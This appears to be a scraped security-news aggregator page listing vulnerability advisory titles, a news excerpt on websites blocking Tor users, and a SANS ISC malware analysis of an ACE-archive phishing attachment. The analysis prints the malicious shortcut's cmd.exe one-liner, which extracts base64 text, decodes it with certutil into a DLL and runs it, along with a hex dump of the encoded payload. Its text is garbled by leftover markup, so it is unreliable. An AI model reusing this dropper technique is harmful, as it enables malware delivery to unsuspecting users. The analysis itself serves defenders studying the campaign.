Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
[SECURITY] [DSA 3490-1] websvn security update
 
Belkin N150 Router Multiple XSS Vulnerability
 

(credit: David Stanley)

About 1.3 million IP addresses—including those used by Google, Yahoo, Craigslist, and Yelp—are turning users of the Tor anonymity network into second-class Web citizens by blocking them outright or degrading the services offered to them, according to a recently published research paper.

Titled "Do You See What I See? Differential Treatment of Anonymous Users," the paper said 3.67 percent of websites in the Alexa 1,000 discriminated against computers visiting with known Tor exit-node IP addresses. In some cases, the visitors are completely locked out, while in others users are required to complete burdensome CAPTCHAs or are limited in what they can do. The authors said the singling out was an attempt by the sites to limit fraud and other online crime, which is carried out by a disproportionately high percentage of Tor users. In the process, law-abiding Tor users are being treated as second-class Web citizens.

"While many websites block Tor to reduce abuse, doing so inadvertently impacts users from censored countries who do not have other ways to access censored Internet content," the authors wrote.

Read 4 remaining paragraphs | Comments

 
Import Woocommerce XSS Vulnerability
 
WP Ultimate Exporter XSS Vulnerability
 
WP Advanced Importer XSS Vulnerability
 
CSV Import XSS Vulnerability
 

ived some feedback today from Nick, aSANS ISC reader who detected an interesting phishing campaign based on an ACE file. I also detected the same kind of fileearlier this morning. ACE is an old compression algorithm developed by a German company called e-merge. This file format was popular around the year2000. Today it almost disappeared and was replaced by more popularformatsbut ACE files can still be handled by popular tools like WinRAR or WinZIP. The fact that the format is quite old could helpto bypass common low-level filters implemented by anti-spam solutions.">">The phishing email was a classic one with an attached .RAR file namedfaktura.rar. But the"> # file faktura.rar">It">">The ACE file contains a .lnk file. Link files are shortcut files used by Microsoft Windows to point to another executable file. The file VT score is also very low: 3/55 (1e56acf7b536d8f87234b4f7846fe0c0)."> %windir%\system32\cmd.exe /V:ON /c dir %TEMP%\faktura.lnk /s /b %TEMP%\bwTFO set /p k=%TEMP%\bwTFO findstr TVqQAA !k!%TEMP%\bwTFO certutil -decode %TEMP%\bwTFO %TEMP%\bwTFO.dll del %TEMP%\bwTFO !k! ">A temporary file is created and filled with some malicious code and executed via rundll32. In this case, no macro to download data from a third party website. The malicious code is simply appended to the link file and starts with the string TVqQAA"> 00000740 a3 41 5d 34 0c e0 a5 4d 97 35 a3 e4 11 bd 29 00 |.A]4...M.5....).|00000750 50 56 38 75 73 00 00 00 00 0d 0a 54 56 71 51 41 |PV8us......TVqQA|00000760 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 |AMAAAAEAAAA//8AA|00000770 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 |LgAAAAAAAAAQAAAA|00000780 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|000007a0 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 |AAAAAAAAAAAuAAAA|000007b0 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 |A4fug4AtAnNIbgBT|000007c0 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 |M0hVGhpcyBwcm9nc|000007d0 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a |mFtIGNhbm5vdCBiZ|000007e0 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 |SBydW4gaW4gRE9TI|000007f0 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 |G1vZGUuDQ0KJAAAA|00000800 41 41 41 41 41 43 48 6f 38 76 62 77 38 4b 6c 69 |AAAAACHo8vbw8Kli|00000810 4d 50 43 70 59 6a 44 77 71 57 49 50 2b 4b 33 69 |MPCpYjDwqWIP+K3i|00000820 4d 4c 43 70 59 67 45 78 4b 4f 49 77 73 4b 6c 69 |MLCpYgExKOIwsKli|00000830 45 33 64 74 6f 6a 43 77 71 57 49 55 6d 6c 6a 61 |E3dtojCwqWIUmlja|00000840 4d 50 43 70 59 67 41 41 41 41 41 41 41 41 41 41 |MPCpYgAAAAAAAAAA|00000850 46 42 46 41 41 42 4d 41 51 55 41 4b 53 54 4b 56 |FBFAABMAQUAKSTKV|00000860 67 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 49 |gAAAAAAAAAA4AAOI|00000870 51 73 42 42 51 77 41 44 41 41 41 41 41 67 41 41 |QsBBQwADAAAAAgAA|00000880 41 41 41 41 41 41 41 45 41 41 41 41 42 41 41 41 |AAAAAAAEAAAABAAA|00000890 41 41 67 41 41 41 41 41 41 41 51 41 42 41 41 41 |AAgAAAAAAAQABAAA|"> # strings faktura.lnk | grep TVqQAA | base64 -d - malicious.bin# file malicious.binmalicious.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows">The PE file has a VT score of 1/55 (a911640a5dd4bca99c31eeac18e90901). I">">Xavier">" /> PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
GNU glibc 'getaddrinfo()' Function Multiple Stack Buffer Overflow Vulnerabilities
 
Oracle Java SE CVE-2015-4842 Remote Security Vulnerability
 
eFront 3.6.15.6 CMS â?? (Message Attachment) Persistent Cross Site Scripting Vulnerability
 
Re: Executable installers are vulnerable^WEVIL (case 26): the installer of GIMP for Windows allows arbitrary (remote) and escalation of privilege
 
[KIS-2016-02] Magento <= 1.9.2.2 (RSS Feed) Information Disclosure Vulnerability
 
Extra User Details [Privilege Escalation]
 
Executable installers are vulnerable^WEVIL (case 4): InstallShield's wrapper and setup.exe
 
Ubiquiti Networks UniFi v3.2.10 Generic CSRF Protection Bypass
 
[slackware-security] bind (SSA:2016-054-01)
 
[SECURITY] [DSA 3489-1] lighttpd security update
 
Internet Storm Center Infocon Status